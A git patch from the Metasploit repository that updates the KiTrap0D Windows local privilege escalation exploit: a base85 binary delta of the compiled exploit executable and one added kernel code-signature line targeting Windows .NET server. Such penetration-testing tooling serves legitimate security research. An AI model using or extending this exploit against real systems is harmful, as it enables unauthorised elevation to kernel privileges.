From cf26fcb9ad519ddfe8f76d14c83575df98c3dfac Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Wed, 27 Jan 2010 07:02:07 +0000
Subject: [PATCH] Fixes #784. Adds .NET server support

git-svn-id: file:///home/svn/framework3/trunk@8256 4d416f70-5f16-0410-b530-b9f4589650da
---
 data/exploits/kitrap0d/vdmallowed.exe | Bin 72704 -> 72704 bytes
 external/source/kitrap0d/vdmallowed.c |   1 +
 2 files changed, 1 insertion(+)

diff --git a/data/exploits/kitrap0d/vdmallowed.exe b/data/exploits/kitrap0d/vdmallowed.exe
index 72df3de307c86d952361e83aba2a4e2eabf975a7..52955aa1e60dc05ec92696b6854b8f5520613780 100644
GIT binary patch
delta 5885
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

delta 5866
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

diff --git a/external/source/kitrap0d/vdmallowed.c b/external/source/kitrap0d/vdmallowed.c
index cf59a77ecf..a7de14f406 100644
--- a/external/source/kitrap0d/vdmallowed.c
+++ b/external/source/kitrap0d/vdmallowed.c
@@ -111,6 +111,7 @@ struct CodeSignature CodeSignatures[] = {
 	{ "\x64\xA1\x1C\x00\x00\x00\x5F\x8B\x70\x04\xB9\x84\x00\x00\x00\x89", 1 }, // Windows 2000 SP4 Advanced Server
 	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x70\x04\xB9\x84", 2 }, // Windows XP
 	{ "\xA1\x1C\xF0\xDF\xFF\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00\x00", 3 }, // Windows 2003
+	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 3 }, // Windows .NET
 	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 4 }, // Windows Vista
 	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 5 }, // Windows 2008
 	{ "\x64\xA1\x1C\x00\x00\x00\x8B\x7D\x58\x8B\x3F\x8B\x88\x24\x01\x00", 6 }, // Windows 7